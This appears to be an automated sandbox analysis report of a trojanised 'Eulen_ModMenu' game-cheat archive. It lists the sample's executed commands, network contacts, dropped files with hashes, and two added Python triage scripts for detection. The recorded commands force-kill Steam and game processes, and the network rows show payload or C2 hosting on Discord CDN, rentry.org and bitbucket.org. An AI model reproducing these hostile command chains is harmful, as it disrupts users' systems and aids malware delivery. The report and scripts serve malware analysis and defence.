reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "tf_win64.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "dota2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "cs2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RustClient.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "GTA5.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "TslGame.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "steam.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5664 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "tf_win64.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "dota2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "cs2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RustClient.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "GTA5.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "TslGame.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "steam.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=896 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
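Added example, not part of the sandbox report: a Python triage script that reconstructs the `tasklist` / `find /i` / `taskkill /f /im` chain from the command lines listed above, which is what the "Enumerates processes with tasklist", "Kills process with taskkill" and "Delays execution with timeout.exe" signatures are reacting to. The command lines embedded below are copied from this report (a subset, in execution order); the regular expressions, the "three or more targets" verdict threshold and the field names are the editor's assumptions.

```python
import re

# Constructed sample: command lines copied from the process list above (subset).
SAMPLE_CMDLINES = [
    'timeout /t 3',
    'tasklist',
    'find /i "steam.exe"',
    'taskkill /f /im steam.exe',
    'timeout /t 3',
    'tar -xf "C:\\Users\\Admin\\AppData\\Local\\Temp\\downloaded_archive.rar" -C ""',
    'tasklist',
    'find /i "tf_win64.exe"',
    'taskkill /f /im tf_win64.exe',
    'tasklist',
    'find /i "dota2.exe"',
    'taskkill /f /im dota2.exe',
    'tasklist',
    'find /i "cs2.exe"',
    'taskkill /f /im cs2.exe',
]

# Assumed patterns for the three tools as they appear in this report.
FIND_RE = re.compile(r'^find\s+/i\s+"([^"]+)"', re.IGNORECASE)
KILL_RE = re.compile(r'^taskkill\s+/f\s+/im\s+(\S+)', re.IGNORECASE)
TIMEOUT_RE = re.compile(r'^timeout\s+/t\s+(\d+)', re.IGNORECASE)


def find_kill_chains(cmdlines):
    """Return image names targeted by a consecutive tasklist -> find /i -> taskkill /f /im
    chain where the find and taskkill arguments name the same image."""
    targets = []
    for i in range(len(cmdlines) - 2):
        if cmdlines[i].strip().lower() != 'tasklist':
            continue
        m_find = FIND_RE.match(cmdlines[i + 1].strip())
        m_kill = KILL_RE.match(cmdlines[i + 2].strip())
        if m_find and m_kill and m_find.group(1).lower() == m_kill.group(1).lower():
            targets.append(m_kill.group(1))
    return targets


def summarize(cmdlines):
    """Aggregate the kill chains, the total sleep inserted with timeout.exe and the
    number of tar extractions, and attach an assumed verdict (>= 3 targets)."""
    targets = find_kill_chains(cmdlines)
    sleep_seconds = 0
    for c in cmdlines:
        m = TIMEOUT_RE.match(c.strip())
        if m:
            sleep_seconds += int(m.group(1))
    archives = sum(1 for c in cmdlines if c.strip().lower().startswith('tar '))
    return {
        'kill_targets': targets,
        'total_sleep_seconds': sleep_seconds,
        'archive_extractions': archives,
        'verdict': 'game-process-kill-loop' if len(targets) >= 3 else 'inconclusive',
    }


if __name__ == '__main__':
    print(summarize(SAMPLE_CMDLINES))
```

The same three-command shape, repeated once per image name, is also a cheap process-tree detection: `tasklist.exe` whose parent is `cmd.exe`, immediately followed by `find.exe` and `taskkill.exe /f` from the same parent. The list of targets on this page (Steam and a set of game clients) is the only part specific to this sample.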
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 2.17.251.21:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 2.21.17.194:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | dl-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 21.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.242.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| GB | 142.250.187.234:443 | | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.22:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 22.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| FR | 172.217.20.195:443 | update.googleapis.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | 195.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | 188.108.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 2.17.251.4:443 | bzib.nelreports.net | tcp |
| US | 2.17.251.4:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | 4.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | rentry.org | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 105.58.132.164.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
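Added example, not part of the sandbox report: a Python script that parses rows of the Network table above and separates the sample's own traffic (Discord CDN, rentry.org, bitbucket.org, the hosts behind the "Legitimate hosting services abused for malware hosting/C2" signature) from the DNS, reverse-lookup, multicast and browser telemetry rows. The rows embedded below are copied from this report (a subset) and include rows in which the raw export places the protocol in the Domain column; the allowlist of browser-noise domains is the editor's assumption for this sandbox image, not something the report states.

```python
from collections import defaultdict

# Constructed sample: rows copied from the Network table above (subset).
SAMPLE_ROWS = """
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | rentry.org | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| FR | 172.217.20.195:443 | update.googleapis.com | tcp |
"""

# Assumption: registrable domains the Edge browser in this sandbox image contacts
# on its own. Not from the report; tune per image.
BROWSER_NOISE = {"microsoft.com", "bing.com", "googleapis.com",
                 "nelreports.net", "azureedge.net"}


def parse_rows(text):
    """Return (country, ip, port, domain, proto) per row. A row whose Domain cell
    holds 'tcp'/'udp' and whose Proto cell is empty is an export glitch: shift it."""
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip('|').split('|')]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        if domain in ('tcp', 'udp') and proto == '':
            domain, proto = None, domain
        ip, port = dest.rsplit(':', 1)
        rows.append((country, ip, int(port), domain, proto))
    return rows


def registrable(domain):
    # Last two labels; adequate for the hosts in this report, not a PSL lookup.
    return '.'.join(domain.split('.')[-2:])


def triage(text):
    """Map each non-allowlisted domain to the set of 'ip:port/proto' endpoints it
    was reached on, dropping DNS (port 53), mDNS (5353), reverse lookups and
    rows with no domain. UDP/443 (QUIC) is kept."""
    interesting = defaultdict(set)
    for country, ip, port, domain, proto in parse_rows(text):
        if port in (53, 5353) or domain is None:
            continue
        if domain.endswith('.in-addr.arpa') or registrable(domain) in BROWSER_NOISE:
            continue
        interesting[domain].add(f"{ip}:{port}/{proto}")
    return dict(interesting)


if __name__ == '__main__':
    for domain, endpoints in sorted(triage(SAMPLE_ROWS).items()):
        print(domain, sorted(endpoints))
```

Two rows in the table reach 162.159.129.233:443 over UDP before the TCP connection; that is consistent with a QUIC attempt and is not by itself a second indicator, so the script folds it into the same domain rather than listing it separately.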
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | cd181299f06462062d3048df0982c762 |
| SHA1 | 98aa7b13747ea9d117c44afe2da339d3da37ab6a |
| SHA256 | dfc43fc93bc23099fd9ba281277406489887fd55fdfe1f16af1e8625c3c6e773 |
| SHA512 | f9bbd51e0c011dd6a97f31275323c4e5d8a764f7f0121b0c48af4fbd50204e6c383e83628089d270ecac1e5a118b2ce9b10f7970042f5843a3fd14d525cdd48c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c55b6d0d0267bb7b4dde087de1d4144f |
| SHA1 | 4ea3e27b654c42cbb32ce0d88bafb366c2943a73 |
| SHA256 | 3d329d25276d1fee413325fe195949ab1557aba733cfe17a4b93f425f65d0884 |
| SHA512 | d5cc9255caf81886aa34d923984f30e72712b9d4697414a3ac2398018318eecbb42de7244d17ccc0b5abfe477e2b5e56cd3aab504ec145f13ebe0e091277095a |
\??\pipe\crashpad_2872_KXXRSKNYDJZEYRLI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ebe22f02d9419e9738e239a9ff6eb5c6 |
| SHA1 | cdb430a633fa2098f18d53611ae76f5872d03f38 |
| SHA256 | 5080c261d386462a546280a4969d925219b269a93564187506a568ff6d96034a |
| SHA512 | fb869f5e0abc3f51a9c07b22bc78ee332e5c2eb9c22bb78940fb797424182c9825b79d480ef49a00fbb49f1544f83baf8e799246a1c61a5822e1552b3abe9804 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4e0af78b01d75eeb2e91b597f345e717 |
| SHA1 | 4dec333a150e7b2925cb6a7f6e4ea203266c03a9 |
| SHA256 | 373af8c41131102962d671d7f349530f265f08c027dc1867d2f1eadfa1b25b6a |
| SHA512 | a973770e21f751736b03988c09f0f5d3eb329ca67bc7f305bba28f076b845608dc1659bda58105ca682d1efb10578120429c99db24a8121957283c15bfc36686 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 03105bcd7d57bc5c69110d712e7450b2 |
| SHA1 | 3ffa5b9fd2988f1d3d4cd5bcf281c4b06084a17c |
| SHA256 | b9cda8bbc84190b737a9be29a96d716be8c883a3aac141980390749a530d9c74 |
| SHA512 | b492ad3c95ea965ffe94fb8703c29b834c68167ae4f6d6bb48ca7cfab627c0dbfe01af254be06d7e205c125c51c60a3a54b8c42e3d93355c3eee7441d1b57c81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f28133ec3c60b012f691d02aec407aa5 |
| SHA1 | 6dac63c88f419d998e15c1749e1f8165924defb1 |
| SHA256 | 8aa1919aa1af875d81df4171b04e91164aa32c6c051f2e782ea23efca6775375 |
| SHA512 | 7bae08c312a3a44f3d0c0191b2e1ba48baa24a6fd84fabb569910a7e531e3e897bd33829e726338116f1178b56f15c9fba108f1a05575cba413658ecf10c021c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8ea3efec3010e6353c282248462d0c6b |
| SHA1 | a553f760aff366f2df033462eed1576cdbb804f9 |
| SHA256 | 56a2b95e3ec95a3447e8e39c4f87821b3ecfa696b06abfa07b963281fe15dc43 |
| SHA512 | 2f2691dd1f1d4cb09817f936c58692c1253eb797189b6fcd8de0f0fd2206eaa74f3996df50f3d59801fda8388ce4dcbbf86e256c6ce9414e825e582ba9c3c900 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 262358de7954c5b3a19e35facc10bac9 |
| SHA1 | a726a9f928effe28a574a840b873d8fe789fbd94 |
| SHA256 | 93df8e0aac2fe67029ed68c887d47fd564069bc627bfe7366dc22b730803c9eb |
| SHA512 | c1f426eadb0295b9011a9adceebeebd4cfeaac2e17813e9a7c5256b71e243bf4a0418bca8ba5ff21c89438356ffd55b68eaa6d6eb01e251eb6e1c20254932137 |
C:\Users\Admin\Downloads\Eulen_ModMenu.7z
| MD5 | ee21ce584fc7d5c58a64f00a0c6ed18e |
| SHA1 | 26c6e2f5760fb620727f597031bdfe1cf63af696 |
| SHA256 | c434dad4e50e4e0f60fc648574010335c4dff0c59d5876b3e138d8d82b91ac5f |
| SHA512 | e9c9cdbed4939452f194a5f6d1c857743df55f4a9774f9e969d24f447c868bdc2dad442ce2c86f05e1f0160b5f069efa3bad3341d24a6898368f319f5aa289ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | b4cd65d07fc392a15b9b98ddc4ec0b72 |
| SHA1 | 5006fee0faf2603d362a9bdce7841378fba2a488 |
| SHA256 | 522afc6cbfd39cbbfab55953b15018c097f9f41050555f876ab689798c886541 |
| SHA512 | bec3c4cc794b7990f5537042076d812c78985ced099d93fc03185833fb66ffcd418d7c426955b1b9bfef3ef0b698ac638c87631e2606feffe338e0869a8a96ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7a3e2131cd72a71eae772a9223d1bdc2 |
| SHA1 | eb7d6f704561c56cb7a7d7e3f516957b32d2ce5f |
| SHA256 | 23a1c64a98b2f70e314ccab594250b487661249d0248c4547c8ae0affe36f790 |
| SHA512 | 333799c288452545b9c89ad92c9e6c1c47bdf306ffa2e802d7859e65a33cf061ad7dba3a67d243c303ca4aecf58adcadfd9f71693a06db0ec6efa5e88b59f423 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9a7fb95a1b702f25939f273a05753f03 |
| SHA1 | 5104c63438cd57956ac4c3fabc2ffee75d8d0431 |
| SHA256 | 8fe1580f59b05eb36d715ef9b28f8998601980f177e461a2916bacbea730dbbe |
| SHA512 | 764fdc17879e0f4c2023b7bce29345492a9f5839a76138a8949680785be4f67458bdd6e011041e4af20a4ddadb8af503ea917d727173a4865234b6da5bff817d |
C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe
| MD5 | eee2a79d3170f463e9697ddb8b97d41e |
| SHA1 | 818c82b1743c91f423c92742b54355b2058ff417 |
| SHA256 | a4569f2cabda528425ec397aef16d6f8fc15ca94664f6f98d738d0b3dc570b41 |
| SHA512 | 139b6366a088d9aaa055fae4c7853c872fe4a31dfb7dc8e3961f144db0d712342fd4e9ef6f20e5f3cbb225a4f23c3ed24e55d144f9342398e8305f54a327d5ea |
memory/1672-168-0x00000000001F0000-0x00000000001F8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gt34ucde.kga.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4912-179-0x000001D074EB0000-0x000001D074ED2000-memory.dmp
C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe
| MD5 | df6fde77146a91b25c4ec0c86ae45ef0 |
| SHA1 | 9d52a7f79337e41907b64918f7ea08f4ba5784ac |
| SHA256 | 8d6f0c1d1e4878975b953c806014cd734d5b6a5986636355ab9f86b502dd9a86 |
| SHA512 | 2edd6872d216d0dde2aea8d02b0e47fa3b354eddbfce7983fb7e411cc6b89df83c7228e2065df3673037848386cbe461a3200b4fa60278fc9f7fca1aa378d407 |
C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe
| MD5 | 01a72f1659cfe71d56340773f3c89bf9 |
| SHA1 | b87d0a06df5896b9129efd823ea237905cfa9d1e |
| SHA256 | 7205faf5054589ce7dc6b68dcfea45c18859cb49a3c0d4bda840fc9d308152bd |
| SHA512 | 59e1de953a7bbb7f87da2de9c9575ba7c0098b31afc549c1eff2256ee9beddc590aec88d32716f386fd3a7037d610365d72bbded94278cd0d341ce337579d1e8 |
memory/4920-202-0x0000000000B10000-0x0000000000B7D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FA78.tmp\FA79.tmp\FA7A.bat
| MD5 | 7b532a3f19c30058cbdad529901de7c1 |
| SHA1 | d9f4882fce5d9ab3ddc3e8143ea25ff47caf44e6 |
| SHA256 | 64a37a81bfbe37708a8e5d80329dcf5b7c08d5eaed672ceff3075a6bbb8db644 |
| SHA512 | 5d56a01c31cf8fb665a8df7b5708dc3b43c5c8df1464e3787a072e06eed5dc9c6708a44c78801182fb3e5d40239d899b9864598b5bfb960dad02ef6150482c78 |
memory/4920-208-0x0000000003930000-0x0000000003D30000-memory.dmp
memory/4920-209-0x0000000003930000-0x0000000003D30000-memory.dmp
memory/4920-210-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp
memory/4920-212-0x0000000077700000-0x0000000077915000-memory.dmp
memory/3944-213-0x00000000007A0000-0x00000000007A9000-memory.dmp
memory/4920-214-0x0000000000B10000-0x0000000000B7D000-memory.dmp
memory/3944-216-0x00000000024F0000-0x00000000028F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
memory/3944-218-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp
memory/3944-220-0x0000000077700000-0x0000000077915000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c321ce5c529b0b756ad69a719371d600 |
| SHA1 | abf615e98069e732169cb9b56d8b7b58067bd4ec |
| SHA256 | 9ac27c4257a90651a2ff2b6fdf448c47a1893bc5c44b6c06c3715c56ff36a0f6 |
| SHA512 | 8a465b2ab7d61aa3ecfdb8f4fec1e4241230f1c71172c202bb5742a340195346dbe30d6e868dda3e3bb66fd658e6cfb17a44e6780ee9463d7b880f8d00ec8bf6 |
memory/5072-274-0x0000000000E50000-0x0000000000EBD000-memory.dmp
C:\Users\Admin\AppData\Roaming\runHidden.vbs
| MD5 | e549f4a267c5ce0d4661c41cec783fdf |
| SHA1 | 1fd5921d991b21ed21f6a62b80d252eadc1c7ebd |
| SHA256 | fb0d540701ed834da38abb381206a1d2bddb680610a65c13c2bbbfaba237b24e |
| SHA512 | db5b1549072533f85c643c7994428851b1bd483b2396e3459523813c5270609d92185ad0a8eb2719be6007071f2ed3677b481877ece4b24cd73471ddcb32d1ee |
memory/5072-285-0x0000000003910000-0x0000000003D10000-memory.dmp
memory/5072-286-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp
memory/5072-288-0x0000000077700000-0x0000000077915000-memory.dmp
memory/5072-290-0x0000000000E50000-0x0000000000EBD000-memory.dmp
memory/4184-292-0x0000000002230000-0x0000000002630000-memory.dmp
memory/4184-295-0x0000000077700000-0x0000000077915000-memory.dmp
memory/4184-293-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp
memory/1160-298-0x000001F000BD0000-0x000001F000BD1000-memory.dmp
memory/1160-297-0x000001F000BD0000-0x000001F000BD1000-memory.dmp
memory/1160-296-0x000001F000BD0000-0x000001F000BD1000-memory.dmp
